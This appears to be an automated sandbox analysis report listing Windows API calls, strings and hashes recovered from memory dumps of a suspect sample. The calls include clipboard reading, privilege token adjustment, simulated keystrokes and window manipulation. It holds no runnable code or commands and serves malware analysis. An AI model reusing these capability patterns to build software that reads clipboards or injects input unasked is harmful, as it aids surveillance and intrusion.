                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00815807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00815D76
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 26465eda57a213b72750b05889a87484c8771c4a24fa3922ebeeb2633f57ec1f
                                                            • Instruction ID: fde9f2437f46c8c15124b6840b32bdc18203b996891937d402becea0909ddbb6
                                                            • Opcode Fuzzy Hash: 26465eda57a213b72750b05889a87484c8771c4a24fa3922ebeeb2633f57ec1f
                                                            • Instruction Fuzzy Hash: 51112871200B05DFD3208F15E484BA2B7F9FF85750F14892EE5AAC6A50D770E985CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: bd844d38082ec7db0857c79c1d4551c660cff673e6622551cfcfe10db31e1ef2
                                                            • Instruction ID: d3fd7e50bd886c588f3f93780fec1184ab47b00cee3f5ce372599864cf40cabc
                                                            • Opcode Fuzzy Hash: bd844d38082ec7db0857c79c1d4551c660cff673e6622551cfcfe10db31e1ef2
                                                            • Instruction Fuzzy Hash: 6F01A972200225ABCB28DF2DD89196BB7A9FFC5754715443EFD0ACB245E631E901C7D1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 7f77c286925e9f1bc2ad53be9e91a56bbcda69852cea014de80fe29da213b29f
                                                            • Instruction ID: 920364b882a18d441edfc710f13b7ff63380edc568da36030ae8f3ae5a0dc724
                                                            • Opcode Fuzzy Hash: 7f77c286925e9f1bc2ad53be9e91a56bbcda69852cea014de80fe29da213b29f
                                                            • Instruction Fuzzy Hash: 0301D6722047056ED7245B28DC06FA7BBA8FF84760F10852EF65ACA2D1EE31E4418B90
                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 008845C0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
                                                            • API String ID: 1431749950-0
                                                            • Opcode ID: 5eb2f71de629e502ee22c088bb45d0cc4a48bc2dd22da86109d7cb4c1707496f
                                                            • Instruction ID: e791f8b45d0b3a3058d152552378ed29c06f96c59381ae669284dfbda7ee57b4
                                                            • Opcode Fuzzy Hash: 5eb2f71de629e502ee22c088bb45d0cc4a48bc2dd22da86109d7cb4c1707496f
                                                            • Instruction Fuzzy Hash: D3F03135604145AF8B14EB68D846C9F7BBCFF85720F00405AF905DB251DE70A941C7A1
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00834AD6
                                                              • Part of subcall function 00838D68: __getptd_noexit.LIBCMT ref: 00838D68
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 9312cd671523439e637408faed9196b0a28c2256c0e1bf78069c5a2cd7332c59
                                                            • Instruction ID: 7d28ed690e0da6f41fe7664feac436b2bcccfbfeca60ebcad70e94bc8877a0ac
                                                            • Opcode Fuzzy Hash: 9312cd671523439e637408faed9196b0a28c2256c0e1bf78069c5a2cd7332c59
                                                            • Instruction Fuzzy Hash: C6F08C31940219EBDF61AF688C0679E76A1FF80325F148514B824EA1D1DB789E50DBD2
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,008D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00814FDE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 65c13388fa5322ce2f7d746c9d8fa1256b258a660f47421c8e89bd10dd43dfe5
                                                            • Instruction ID: 8d9ff2c22765353f071b89834296dc0fb24bd4db1479fc46d1b1e7be98d1d833
                                                            • Opcode Fuzzy Hash: 65c13388fa5322ce2f7d746c9d8fa1256b258a660f47421c8e89bd10dd43dfe5
                                                            • Instruction Fuzzy Hash: 99F03971105716CFCB349F64E494892BBE9FF043293249A3EE1D6C2710CB72A895DF80
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008309F4
                                                              • Part of subcall function 00817D2C: _memmove.LIBCMT ref: 00817D66
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 4ec0c472b3921ede1a52bc5d5323434bfbde1aaab88f1aabd6b1bbd8ebd15a3d
                                                            • Instruction ID: 204312f570fb74d3882225d0827d67232b3df10dfe8985d1321dc73604e3f4af
                                                            • Opcode Fuzzy Hash: 4ec0c472b3921ede1a52bc5d5323434bfbde1aaab88f1aabd6b1bbd8ebd15a3d
                                                            • Instruction Fuzzy Hash: 90E0CD3690422C57C720E69C9C05FFA77EDEF887A0F0401B6FD0CD7209DA649CC18691
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction ID: 22a689ffe0709bf9f4ffdf014d37811b970d291a77d03f131f4b973a9c55f703
                                                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                            • Instruction Fuzzy Hash: 5AE09AB0214B009FDB388A28D811BE373E0FB06315F00081CF2EEC3342EB62B8418B69
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0084E16B,?,?,00000000), ref: 00815DBF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 88b57a70b4e557cea9067132df0ea3da6544b27dba1c54371ecc2dbf4ef84c91
                                                            • Instruction ID: e7f8523bfe67edf9167dfd8ffb4a09745e9fbd2459fa5fff4e62a54a4a1bbb80
                                                            • Opcode Fuzzy Hash: 88b57a70b4e557cea9067132df0ea3da6544b27dba1c54371ecc2dbf4ef84c91
                                                            • Instruction Fuzzy Hash: 80D0C77464020CBFE714DB80DC46FA9777CE705710F100195FE0496690D6B27D508795
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: ccc1194e2ae7f85a7f4ef3cf9c4fe9dbcd3645a250efe1608b1f8b830e3affd5
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 8DB092B684020C77DE012E86EC02A593B19AB80678F808020FB0C18162A673A6A096CE
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0087D46A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 9dc583733d3c270db39efad7bde1ae368e98922cfaddf5439d122496c878fb9d
                                                            • Instruction ID: a3beb254cb4f18a5de173d85299d9aee43b675ad153d509a56337997f4f2be02
                                                            • Opcode Fuzzy Hash: 9dc583733d3c270db39efad7bde1ae368e98922cfaddf5439d122496c878fb9d
                                                            • Instruction Fuzzy Hash: A0711C302047018FC714EF28D491AAAB7F5FF88314F04496DF59ADB2A6DB30E949CB56
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: dcade72d687d186e650e88b2d380df5471e629983c2a5ddae80b4bbc30d764f8
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: C831C074A00109DBC718DF58D4A0969F7A6FF99304F688AA5E40ACB651DB31EDC1CFC0
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 024422B1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2116009755.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2440000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: a6e6615032a69eb59c4fd36bdc081b8ac1fa3cd918bfb703f3246a4b4ee39775
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 61E0E67494010EDFDB00EFB4D64969E7FB4FF04301F100161FD01D2280DA709D508A72
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0089CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0089CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0089CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0089CF00
                                                            • SendMessageW.USER32 ref: 0089CF29
                                                            • _wcsncpy.LIBCMT ref: 0089CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0089CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0089CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0089CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0089CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0089D018
                                                            • SendMessageW.USER32 ref: 0089D03F
                                                            • SendMessageW.USER32(?,00001030,?,0089B602), ref: 0089D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0089D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0089D16E
                                                            • SetCapture.USER32(?), ref: 0089D177
                                                            • ClientToScreen.USER32(?,?), ref: 0089D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0089D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0089D203
                                                            • ReleaseCapture.USER32 ref: 0089D20E
                                                            • GetCursorPos.USER32(?), ref: 0089D248
                                                            • ScreenToClient.USER32(?,?), ref: 0089D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0089D2B1
                                                            • SendMessageW.USER32 ref: 0089D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0089D31C
                                                            • SendMessageW.USER32 ref: 0089D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0089D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0089D37B
                                                            • GetCursorPos.USER32(?), ref: 0089D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0089D3A8
                                                            • GetParent.USER32(?), ref: 0089D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0089D431
                                                            • SendMessageW.USER32 ref: 0089D462
                                                            • ClientToScreen.USER32(?,?), ref: 0089D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0089D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0089D51A
                                                            • SendMessageW.USER32 ref: 0089D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0089D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0089D5C3
                                                              • Part of subcall function 008125DB: GetWindowLongW.USER32(?,000000EB), ref: 008125EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0089D65F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3977979337-4164748364
                                                            • Opcode ID: 967a87d9d031a7a55551c3e38d4b1817a79348773c352a6f0f5928a1a9195ae6
                                                            • Instruction ID: 58d7362e27bdb2780ef14261055720ff42eed108d7151482be392a9f21a0b923
                                                            • Opcode Fuzzy Hash: 967a87d9d031a7a55551c3e38d4b1817a79348773c352a6f0f5928a1a9195ae6
                                                            • Instruction Fuzzy Hash: 1A42B030104345AFDB25EF28C854FAABBE6FF49314F18062EF656C72A1D7329854CB96
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0089873F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: ecfc55c5416246414e7ccac267c5287c25e525755a3154ab18c32d881c65e8b4
                                                            • Instruction ID: f162827eb6fddfabf0afb03ce33dec34f893d6def10c6cf4674a26aaa257540f
                                                            • Opcode Fuzzy Hash: ecfc55c5416246414e7ccac267c5287c25e525755a3154ab18c32d881c65e8b4
                                                            • Instruction Fuzzy Hash: D112A171500209EBEF25AF68CC49FAA7BB9FF46714F284129F516EA2E1DF708941CB50
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: 686185a739047d5d4405381b0b190e8c67116bcc6e0ac687c4991c1c3aa9d492
                                                            • Instruction ID: 6a3cb59c6f26db3c76156a10fa6aef36743eab094ab022d408ff1efab83678cd
                                                            • Opcode Fuzzy Hash: 686185a739047d5d4405381b0b190e8c67116bcc6e0ac687c4991c1c3aa9d492
                                                            • Instruction Fuzzy Hash: 2C939071A04219DFDB24CF98D881BADB7B1FF48714F26816AE945EB381E7709E81CB50
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00814A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084DA8E
                                                            • IsIconic.USER32(?), ref: 0084DA97
                                                            • ShowWindow.USER32(?,00000009), ref: 0084DAA4
                                                            • SetForegroundWindow.USER32(?), ref: 0084DAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0084DAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 0084DACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0084DAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0084DAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0084DAF8
                                                            • SetForegroundWindow.USER32(?), ref: 0084DAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084DB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 0084DB47
                                                            • SetForegroundWindow.USER32(?), ref: 0084DB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0084DB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: a4390a2abd4d5e624229da94fdefd5c46d33876e00262dce09b3501b51b4808a
                                                            • Instruction ID: ed815414bc5b98dd5a09ac4e016dcd5456c34e1e0d51ce875b1610cf6cd53b01
                                                            • Opcode Fuzzy Hash: a4390a2abd4d5e624229da94fdefd5c46d33876e00262dce09b3501b51b4808a
                                                            • Instruction Fuzzy Hash: DF316371A4031CBBEB256FA19C49F7F3E6CFB44B60F154026FB05EA1D1D6B05D10AAA1
                                                            APIs
                                                              • Part of subcall function 00868CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                              • Part of subcall function 00868CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                              • Part of subcall function 00868CC3: GetLastError.KERNEL32 ref: 00868D47
                                                            • _memset.LIBCMT ref: 0086889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008688ED
                                                            • CloseHandle.KERNEL32(?), ref: 008688FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00868915
                                                            • GetProcessWindowStation.USER32 ref: 0086892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00868938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00868952
                                                              • Part of subcall function 00868713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00868851), ref: 00868728
                                                              • Part of subcall function 00868713: CloseHandle.KERNEL32(?,?,00868851), ref: 0086873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 6680f7eb6513a0b2fa3a3a293ad56d1e1bcb6c2d00855816b739264d446af71c
                                                            • Instruction ID: b1aa9b7601d30572fc9dad266c85a3b8c5ec9a3f44ef27236cf957bce9d3cf5f
                                                            • Opcode Fuzzy Hash: 6680f7eb6513a0b2fa3a3a293ad56d1e1bcb6c2d00855816b739264d446af71c
                                                            • Instruction Fuzzy Hash: 8E8158B1900219EFDF11DFE4DC45AAE7BB8FF04305F09426AFD18E6261DB318A149B62
                                                            APIs
                                                            • OpenClipboard.USER32(0089F910), ref: 00884284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00884292
                                                            • GetClipboardData.USER32(0000000D), ref: 0088429A
                                                            • CloseClipboard.USER32 ref: 008842A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 008842C2
                                                            • CloseClipboard.USER32 ref: 008842CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008842E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 008842EE
                                                            • GetClipboardData.USER32(00000001), ref: 008842F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00884303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00884337
                                                            • CloseClipboard.USER32 ref: 00884447
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 27da44da9ad8f98e3218e69695680f90397a83ae22ab8f6e25bc078b9534c2ed
                                                            • Instruction ID: c902c9690a9ca5c5db918ff51c45661a5fbefe0b66cafc70e4059b7ac3d8e6ce
                                                            • Opcode Fuzzy Hash: 27da44da9ad8f98e3218e69695680f90397a83ae22ab8f6e25bc078b9534c2ed
                                                            • Instruction Fuzzy Hash: 66518272208306ABD305FF64EC85F6E77A8FF94B00F14452AF695D21A2DB70D9448B63
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0087C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0087CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0087CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0087CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0087CAAF
                                                            • __swprintf.LIBCMT ref: 0087CAFB
                                                            • __swprintf.LIBCMT ref: 0087CB3E
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • __swprintf.LIBCMT ref: 0087CB92
                                                              • Part of subcall function 008338D8: __woutput_l.LIBCMT ref: 00833931
                                                            • __swprintf.LIBCMT ref: 0087CBE0
                                                              • Part of subcall function 008338D8: __flsbuf.LIBCMT ref: 00833953
                                                              • Part of subcall function 008338D8: __flsbuf.LIBCMT ref: 0083396B
                                                            • __swprintf.LIBCMT ref: 0087CC2F
                                                            • __swprintf.LIBCMT ref: 0087CC7E
                                                            • __swprintf.LIBCMT ref: 0087CCCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 35726b73981abdb9f473fb9481dc749250f06b263f42d11c2fb2413668df8dce
